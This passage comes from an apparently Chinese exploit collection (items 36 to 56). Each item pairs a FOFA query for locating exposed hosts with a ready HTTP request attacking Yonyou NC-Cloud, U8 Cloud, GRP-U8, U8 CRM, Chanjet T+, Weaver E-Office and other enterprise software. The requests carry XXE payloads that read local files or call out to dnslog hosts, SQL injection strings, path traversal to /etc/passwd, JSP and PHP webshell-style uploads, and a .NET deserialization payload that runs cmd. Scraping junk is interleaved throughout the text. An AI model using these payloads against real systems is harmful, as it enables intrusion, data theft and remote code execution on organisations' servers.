; D% ^' ] q. C" kPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1 B5 a; k3 G. q3 [, u! ]& w6 b* c3 ?
Host: 203.25.218.166:88888 E. A. n* |( |- \2 @0 I+ u
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info, B! B9 ?6 z: D; Z4 o- F8 c" P
Accept-Encoding: gzip, deflate
0 p9 p# y5 \! H) E. w$ d N( dAccept: */*
% [$ u" }# l+ Q. h2 j! cConnection: close3 ~2 w) `6 j- m* Z
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA" e& a3 ~* X i) f
Content-Length: 190) o# x* e/ G( }- b
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
! r% I# S6 u. }0 `% m0 A5 v9 `$ Y- g' E
--fd28cb44e829ed1c197ec3bc71748df03 V V* s4 [8 v! K, y b& B9 [
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
7 o/ s3 R( i$ x8 A: H. T0 `1 |5 B2 _$ \0 q4 [- W* L
<%out.println(1111*1111);%>
# Z$ h1 c. a/ f& ]% M& i--fd28cb44e829ed1c197ec3bc71748df0--' [* a% I+ N2 ]* x7 ^( ~
, X; E% b% y7 S; T/ s
& y4 i4 @- ^ L; @: n# a
36. 用友NC-Cloud soapFormat XXE
; M2 y" B6 j; O7 P; I" cFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
9 P$ [. Z! }. x* [. d: Y/ NPOST /uapws/soapFormat.ajax HTTP/1.19 a& g9 {5 J s5 ~3 @5 w% E. D
Host: 192.168.40.130:8989
9 F- ?' ?9 d. }5 P% M& \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
$ W- O5 s2 ] g, }8 KContent-Length: 2632 }9 y- J! ]) _3 @9 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 p; u7 x' u& |Accept-Encoding: gzip, deflate) @0 u. G D9 P2 D# ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- f1 ~6 q4 S, |# UConnection: close6 Z8 ^, G0 @; \- V/ ~! l& V
Content-Type: application/x-www-form-urlencoded% I9 u) G9 O1 {; b
Upgrade-Insecure-Requests: 1/ x. `) y8 L; p
! s9 p. p( h) u( v cmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
s$ j+ D) ^( M" d0 v' z
# P! C ^ i6 K( K4 u1 J1 T3 ], K, j: X' s" v6 x/ H# \. S
37. 用友NC-Cloud IUpdateService XXE) N( [% K* ~5 a( _7 p
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"$ u, r6 ]! h( ^+ ~/ t) A! {% t
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1! R( B/ ~7 [6 D' ~9 t
Host: 192.168.40.130:8989
3 h* _2 o) K5 j& W" w9 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36, F: q- |4 S' y# I0 S
Content-Length: 4212 O4 K* {9 [, P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: I, S6 O/ t8 r7 R% F9 }( L
Accept-Encoding: gzip, deflate2 Z3 @; J7 i) H1 \; g& ^( P' A
Accept-Language: zh-CN,zh;q=0.9
: }1 a- M9 w7 u( C% K) a! O2 lConnection: close/ O7 Y8 X1 h' ]" M
Content-Type: text/xml;charset=UTF-83 K) D6 ?+ y0 q! Y6 b$ H E4 k. H
SOAPAction: urn:getResult* K- e! L/ c _4 S8 ]$ u, q. }
Upgrade-Insecure-Requests: 1
2 t( H* [, h! \. A" c2 r7 s% C/ J8 C0 d
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
, J' B* l% z9 |$ R9 e. W; ~3 l<soapenv:Header/>0 t; `8 K8 n* ^1 C- K0 p* i O$ T; q
<soapenv:Body>* P: R2 u. @1 h; h
<iup:getResult>
. k+ }5 t/ }9 ~; A<!--type: string-->
$ N4 x2 U- C/ U<iup:string><![CDATA[
( Z$ Z# l* R4 d v7 m! e+ @<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>0 E& |' W- |9 y, c$ s) f
<xxx/>]]></iup:string>
5 c/ Q2 I& d: C4 `</iup:getResult>
; x G/ B/ q* A, k0 a</soapenv:Body>; D4 J$ s: p) Z/ J2 ^7 ~7 I6 Y$ r
</soapenv:Envelope>
& |' Y0 U1 Z( b; s0 K. M- @1 O: v/ K T( D
! Z# o- h. l- \# M! k* K
! x( d% R0 C6 n% c& V& G38. 用友U8 Cloud smartweb2.RPC.d XXE
7 J: X% I/ F9 o% s ]4 J5 m& s7 o8 mFOFA:app="用友-U8-Cloud"' r* Y+ U, m& v4 T3 P7 m
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1( V# s. p7 v9 e, V# L
Host: 192.168.40.131:8088' m% ^9 A0 V# ~( T! `, J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25* N4 M: {! b! ?- E, D
Content-Length: 260
/ o) P' i$ a1 a. v1 D U( T. F0 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
# P+ l) k& @& n/ x7 ?Accept-Encoding: gzip, deflate
7 }3 J! S1 j5 |2 n! b9 g/ |Accept-Language: zh-CN,zh;q=0.90 I7 f) ?9 U/ k" k% W( h+ ?+ j1 t
Connection: close6 K- `4 `$ S, s$ i
Content-Type: application/x-www-form-urlencoded9 U8 m7 K. C, L4 ]5 p p& ~
& K+ c; k# U4 X__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
5 L4 N3 Z) N) A* b2 }/ {% m! _, [1 V. K- g- q2 I+ ^, }
6 ~; u( B# Y5 a4 {: M
39. 用友U8 Cloud RegisterServlet SQL注入
: R$ z Q; P" x, z2 k+ t2 U, @FOFA:title="u8c"
8 `+ j) ^; ^9 q+ cPOST /servlet/RegisterServlet HTTP/1.1
. _/ X$ j \/ S; I; p9 X" J3 sHost: 192.168.86.128:8089
e1 b) g L' t8 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36% N! k9 s+ ^# t4 h4 M: G0 p+ E
Connection: close
9 K; H, w- K2 O5 P2 D [Content-Length: 85
N5 n; o: P: |$ O2 f/ M; dAccept: */*
. H3 @" O- [5 @: E+ L8 j# MAccept-Language: en$ h' m! E" `; A& Y6 {: v
Content-Type: application/x-www-form-urlencoded
6 Z p, y2 W! ]; wX-Forwarded-For: 127.0.0.1
3 A3 _ u1 E) e; lAccept-Encoding: gzip
) r4 c, H& D/ b4 T) B: n" P: h+ Y1 F
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
& z4 i, l' G. s0 z( G+ I+ W( L) F$ t% z
" q( R1 H* i. f! E0 Q' W: m40. 用友U8-Cloud XChangeServlet XXE6 a: ^; F; L5 g! V0 ^+ f! a
FOFA:app="用友-U8-Cloud"
3 B& E! a1 e7 kPOST /service/XChangeServlet HTTP/1.14 L; u: H$ J1 ?; C3 `! k2 `; h
Host: x.x.x.x
. ^( b, Z( i' D% S+ \. WUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: k! V6 Y$ ^8 S* [/ L" q
Content-Type: text/xml
$ b+ l' _' G% E0 ~2 p4 CConnection: close
- v9 Q0 B h" ~; x2 I5 i0 B
8 y4 b& ~! A/ \; {9 r4 C<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r> v9 N+ p o+ \# ^) M
3 k" G3 ~( _; U6 v
4 B, Z' P! V" E6 K41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
+ E/ i9 F2 i, ?, I7 OFOFA:app="用友-U8-Cloud"
9 b- @0 U+ A+ z5 E/ |5 `* w! DGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1. _ e( y2 D6 P+ P+ j! {$ ^
Host:/ W) w& A8 v2 N( t6 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.150 q0 q$ B" t% Z) ~) D# ~/ j
Content-Type: application/json
8 a. {& M' T4 t2 @- K& lAccept-Encoding: gzip
$ M! o5 i! L+ i4 j) `5 |8 YConnection: close
7 ^: k" T2 n' z, \& Z4 B2 w: F) _' T- ~/ U( r
) |1 R$ G' d4 d( t; A' A* E' L- c
42. 用友GRP-U8 SmartUpload01 文件上传
5 ~; R/ f7 H1 Y% F7 k2 W9 s, ]FOFA:app="用友-GRP-U8") n6 C" `4 B k. a$ }6 ]
POST /u8qx/SmartUpload01.jsp HTTP/1.17 ?) N, J8 A5 d a }3 c+ Y4 @
Host: x.x.x.x" d" W, \) ?( O6 U; i/ ?. `
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
|; L& \1 ^0 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
3 U3 V+ E/ r, m2 c( F, q, y/ P/ p. c; @! ?
PAYLOAD9 K5 [0 d% A9 P4 ]* D
9 e$ F6 S4 I1 X
3 B0 M/ N+ C) | a Zhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
. L5 ^2 q6 o1 q2 [4 r4 ~
$ ^* k# C; v) B* b( d% p43. 用友GRP-U8 userInfoWeb SQL注入致RCE
. W0 W8 U& s7 W" w- T( w8 ~: yFOFA:app="用友-GRP-U8"
9 A* G' g- A+ i* q# W4 x: `/ mPOST /services/userInfoWeb HTTP/1.1
* [4 m) h) | M# R$ r+ \. M5 gHost: your-ip" z7 ^6 O7 j* X* U4 u" ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36, \* S9 g3 W& {$ ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: T: t( b- Y9 ^1 h( bAccept-Encoding: gzip, deflate
# S4 ~( L" w' d# V0 OAccept-Language: zh-CN,zh;q=0.9
) D! a3 ?' D( n# Z% pConnection: close
$ O" }8 c0 c# ^$ |3 x$ l% x0 V MSOAPAction:
: G G! q0 Z% ^Content-Type: text/xml;charset=UTF-8
3 B, q) K' u% T7 ^" d* \! |8 {+ I4 `+ L9 f- ^% q
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">8 c* j( W D& L" r8 c* u
<soapenv:Header/>8 i) f3 _& K3 ]/ u9 q+ Y# ^0 v9 X
<soapenv:Body>
. q! V! B/ }. L/ ^' E8 |. f <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">8 @( V# ?' K% @: d/ K1 u" S) V
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>( Q% b5 c6 } I: T& f
</ser:getUserNameById>+ D: S+ k6 g: P& ~3 T& _" E! A
</soapenv:Body>% B Q$ t( K0 ~! ?) ^' ?
</soapenv:Envelope>, {- Q3 ?$ T3 ]/ ~% N+ f$ m4 I
% q+ f9 t" O9 d7 ^! f
; b8 f) Q7 Y# p" i7 n
44. 用友GRP-U8 bx_dj_check.jsp SQL注入: O) r5 H) Q; x, x; ]1 e& ?: Y( {
FOFA:app="用友-GRP-U8"
; J5 {: F+ o' WGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.17 S# m. K2 ~8 l3 A, o- K
Host: your-ip9 c: o6 M1 l/ r: L. A# M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
2 X$ D8 @( i: Q) s8 k/ ` R2 c1 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) A3 A9 F. M9 k0 R
Accept-Encoding: gzip, deflate4 _7 [$ l4 [6 r6 v9 `: \
Accept-Language: zh-CN,zh;q=0.9, T2 a" u$ z4 A9 c( M* H t2 p
Connection: close
; Q. [ o Z9 l$ E7 N9 Y- n
* i3 P) L6 Q9 l9 R- W) l0 W/ G8 O3 V( ?4 H0 Y! P8 u
45. 用友GRP-U8 ufgovbank XXE
* {- E. v5 N% u6 Y6 t0 ]FOFA:app="用友-GRP-U8"" L3 D' `, B4 Y. d
POST /ufgovbank HTTP/1.1& @0 @5 K+ ^# b- A/ A0 L
Host: 192.168.40.130:222
8 ^& [0 a7 J5 F1 o" C& WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
& W6 i& M) I( l/ K6 dConnection: close
- Y: Q* H! u4 W1 H$ M" d7 gContent-Length: 161
' [3 E! ?( e; Y; _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) E, S* l2 R) P, J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, _) ]. f1 Y$ R3 N- GContent-Type: application/x-www-form-urlencoded7 K' z8 X/ J `* |% \+ V' M
Accept-Encoding: gzip
( `4 T, {* V2 [- N! e+ P( l6 ] p* c2 w8 C
reqData=<?xml version="1.0"?>' M' D( V1 f' g
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
- k A0 F" n* d# V! ~# p+ i6 _; ]9 C2 f A0 w% k: |. @+ @
2 _- u2 e) {% P) `; x( t$ j
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
3 y" K$ o4 K( `; s) O1 ~FOFA:app="用友-GRP-U8", }) L$ L4 J9 e3 w$ z: ^, M
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.13 b1 o% B6 ?; K d; u
Host: your-ip
% `0 b8 F' T/ O" _) jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.362 o6 L% Z- v% l8 @1 `6 {: J6 U( D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' e$ y; v) L! E7 M" E- e
Accept-Encoding: gzip, deflate: }/ ?3 r1 a z+ I' |
Accept-Language: zh-CN,zh;q=0.9# R. `( Z+ c p$ |3 E( o% ~* ?
Connection: close$ B" w9 _; t) {+ _3 }1 X/ r9 P
, a* k/ O2 k1 `' c3 O* ]( \1 q, o
0 B0 G0 @! O. P) ]) v. o- b47. 用友GRP A++Cloud 政府财务云 任意文件读取% ^3 N2 |( [+ D. p; X- S7 M' i
FOFA:body="/pf/portal/login/css/fonts/style.css"
% x: Z2 z' W+ l, E: xGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1: g' F4 @- A' @8 m4 T1 y
Host: x.x.x.x0 ]3 J. k3 [8 ]: ]
Cache-Control: max-age=0
" Q! E0 ]7 W0 ?( ?$ t& t& }' QUpgrade-Insecure-Requests: 19 h7 C5 J/ F0 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.369 e, \7 J, Y! n: u7 s" G" p/ k/ n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 i) Y5 z) n5 XAccept-Encoding: gzip, deflate, br
8 i2 U6 g4 Y- S$ f1 k$ |Accept-Language: zh-CN,zh;q=0.9+ P% N8 B0 M5 n
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
! |/ {, q! k" d) P" R* d: O6 GConnection: close
- D4 w; s* f4 Y1 K7 P$ }& V9 b3 @' |* I/ n" V2 y6 }
9 A0 h1 S7 t4 m7 v' z
9 @2 A$ S' J; i, r3 H, V2 q48. 用友U8 CRM swfupload 任意文件上传% H& D' w4 }3 T' [
FOFA:title="用友U8CRM"
8 T7 x! ~9 n$ D8 R& Q( w+ ]- f' ^POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1' [- S7 z, w4 p4 R' s1 g' V
Host: your-ip; P# o6 T7 a" m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 G3 N u9 C+ k. w- _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 l# ^/ U; h; N0 K) t2 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# [7 ~5 w( c. Z* z$ k
Accept-Encoding: gzip, deflate* E$ I, ?% }, L9 t/ W
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668557 q4 d# W8 |1 u, R Q
------269520967239406871642430066855
) m, G) g8 S, W/ N5 @& M* _Content-Disposition: form-data; name="file"; filename="s.php"# d7 O) {! h% r8 A M. x% W
1231- }" I6 d* z7 ~
Content-Type: application/octet-stream s9 q; a- x9 F4 C% [) P, Y
------269520967239406871642430066855
. z, R+ M1 Y& q& m5 \" oContent-Disposition: form-data; name="upload"$ {3 k8 F, |4 k" I& k
upload
1 F. h" r' [( A7 y------269520967239406871642430066855--
' y% | ?6 Z# B7 q) E! f8 L/ i5 n% V5 f0 R2 I7 b) a% A: z% I0 F5 `
0 O- K2 G5 T9 h/ Z9 g
49. 用友U8 CRM系统uploadfile.php接口任意文件上传4 M! z) h" L# a7 p l
FOFA:body="用友U8CRM"; {4 [& |0 c- m$ R( z# @
6 ?4 ^6 V8 r4 B* x6 N& r0 A# E+ aPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
3 d- J$ W j1 k* GHost: x.x.x.x8 D) {$ K# [# N8 S) z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 c9 U; q- U: bContent-Length: 329
3 E+ R' X- [. n8 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
; W; n; H/ x, r& Q6 EAccept-Encoding: gzip, deflate
0 h* }% ]. U- G0 G1 V8 s8 dAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" l+ M' ^/ ]! l9 @' S0 n6 e
Connection: close# x' _ ~! a% Y# D7 `
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
! m( Y0 d" P! C3 [+ U7 ?% ?$ n1 D; W. O0 H* ]
-----------------------------vvv3wdayqv3yppdxvn3w
. ]9 S1 k. {4 F( @8 K/ r: yContent-Disposition: form-data; name="file"; filename="%s.php "5 g x( A* i- |. V# |
Content-Type: application/octet-stream1 @2 l4 ^/ c( {6 v
& _+ M4 U! q) u% J# d! Iwersqqmlumloqa2 V- j! Z; j# w$ b
-----------------------------vvv3wdayqv3yppdxvn3w, f! K0 n7 W8 {. ^0 a
Content-Disposition: form-data; name="upload"4 J1 Q. ?% ^ a$ f4 Y1 X
) } a7 }2 h+ rupload
; t |6 B' c* m1 f-----------------------------vvv3wdayqv3yppdxvn3w--
- z; u2 f! }# g8 J0 _& x# W# U6 Z
, R. y8 l1 J1 U1 `3 s; ^- R/ f. A$ }
http://x.x.x.x/tmpfile/updB3CB.tmp.php
+ o3 s4 u9 Z6 T* J/ i$ {' f* u/ @* Z8 g; ?# O6 \3 F& g+ b
50. QDocs Smart School 6.4.1 filterRecords SQL注入
2 e) z g0 ^1 ?; w) KFOFA:body="close closebtnmodal"
/ L" ]! E2 L$ O @POST /course/filterRecords/ HTTP/1.11 p: X$ @4 E' R" P R
Host: x.x.x.x& L3 h% g1 v2 R% k7 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 o+ y3 A: d" P8 q, a b
Connection: close
; Z, d& ]' |9 i" y! _7 sContent-Length: 224
" P) @3 Y6 j# a2 o* TAccept: */*/ }9 ^! p* ?) r- v7 u: f
Accept-Language: en% Z) E7 i ` k8 P" N! U+ \
Content-Type: application/x-www-form-urlencoded
, u4 F. }) [- e$ U; rAccept-Encoding: gzip
8 L. g: P' S* m% `9 m3 _- ]
# v- L( A9 }2 Wsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
) r- K4 @. ^1 |0 W7 N$ _) w4 n: c% J3 Q. Z( g
8 H; Q8 o R5 G% W3 U5 {4 o3 `: a51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
5 d7 d+ G5 u0 o" zFOFA:app="云时空社会化商业ERP系统") U# H& E" O4 E% [- d
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.11 |, q0 v+ g: X" m1 A
Host: your-ip, U. u$ l( f ]1 g+ j7 m8 H8 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36$ d0 |- Z8 `& c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 b: D$ d; P! n4 q' A# w' h) p, c+ F. U
Accept-Encoding: gzip, deflate) q7 V* T$ H* c$ Z! M
Accept-Language: zh-CN,zh;q=0.9
7 p. z( f" ~( ~$ L% I3 DConnection: close
0 a$ M% s4 _$ k+ j$ r [
6 t5 X; o6 l$ J& O& r( N6 q) m d* V. l$ X" h8 f0 U$ S
52. 泛微E-Office json_common.php sql注入
0 s: n0 }7 c+ r& |FOFA:app="泛微-EOffice"
7 L1 T9 T- [- \0 `POST /building/json_common.php HTTP/1.1
6 V1 W' g+ P4 g- E/ C$ oHost: 192.168.86.128:8097! |. Z: b9 k T# W! s
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ o. U, Q, o) f
Connection: close
/ n" f% q! P- z3 IContent-Length: 87
! p* r+ z, m$ RAccept: */*
" s- @0 b* Z. ]$ [4 A6 PAccept-Language: en
0 k% M; F/ B# r1 eContent-Type: application/x-www-form-urlencoded2 u4 @' p! }. s3 n6 s+ C S
Accept-Encoding: gzip2 w( r1 X8 r, {7 ^* t
) ^5 L% `) b8 Z1 O% d/ Z6 `9 \0 x
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
7 ~8 r/ x- [; ]0 E5 Z& \" p! L1 l0 x* D' i
+ m/ L9 V7 |+ P7 y: ^53. 迪普 DPTech VPN Service 任意文件上传) _0 b% k5 L% k' G( `) }
FOFA:app="DPtech-SSLVPN"6 A& m; m# ^" l# |" Q3 Q
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd3 }# m7 n n) u
+ a, C t( f. c8 F% A
+ b/ v/ s3 z6 K0 @
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
8 u9 m# ~- {2 v0 E+ q! y/ dFOFA:app="畅捷通-TPlus"4 i7 ~) C/ b2 _
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
/ E+ Q; ]* | w/ W2 U3 c# f"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"7 C: ?% W7 y( W
2 Z. _( U j$ M" i8 A& ~: u* I( ], ^7 i3 w/ O! Q* R+ c
完整数据包
5 y$ e# R, b& |. S# I7 b' N1 iPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
. L0 i7 E5 r0 hHost: x.x.x.x
. g0 _% C7 t8 u. ]5 w9 |) M7 CUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F" l ?) o$ Q, Y, E* M% X2 Y) Y+ d& r
Content-Length: 593
( y" Y$ K% U. v4 L6 t; ]; u6 Z4 p* N' n0 {4 _" k
{
. u# q, f$ ^4 A6 B7 G+ c" e! `"storeID":{% Y: N R) x; K$ A9 h' M$ e" w
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",! I i5 p6 v" R7 Z- A7 G: o( ^
"MethodName":"Start",2 @, W1 r" S9 w2 e: v; V- j+ P
"ObjectInstance":{- d, Z5 n1 G4 X
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",( [' B% N& Y: K" c
"StartInfo":{
' j4 O- y+ i7 N2 @ "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" m2 y. m+ x, F( W) H "FileName":"cmd",
9 S7 b" Y2 f- Z! q6 x "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
% l+ ?+ K5 s9 T/ O: p/ y }
; `' e' Y& `# H3 Z }! |3 Z4 S' z5 x/ U8 e: z( l6 h, ~' F
}3 @& h+ p- {& o7 l
}( J- T* q& E9 z8 F: l R9 K
( X- `/ y* M/ M, L, W/ m" _# r: k/ J
! Q: I1 w) P6 t# M+ U' V5 u第二步,访问如下url
. O7 c7 i3 U- c" l. R/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt1 v5 ]2 W# x& K$ H4 f n
3 l' y, I# w3 @0 Q) `
) H+ Y' V# ]. m* m+ q3 H55. 畅捷通T+ getdecallusers信息泄露
2 b7 }. Z9 J% s1 f* T8 FFOFA:app="畅捷通-TPlus"
; F9 V5 {+ h. s2 W) f3 o第一步,通过& S8 x% U: N3 d/ `& V8 }
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie. j8 F9 l1 c! }; h' t
第二步,利用获取到的Cookie请求 g" ^6 n: p N
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
m* w3 n* O2 i# }) c: Z
' \! q( h& J; P1 g4 b) W56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
, I8 F" b, }; a( ~2 m4 z YFOFA: app="畅捷通-TPlus": _* S# ~2 w/ V6 E2 n! X& Q& ^
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
: ~3 S. c2 x9 kHost: x.x.x.x
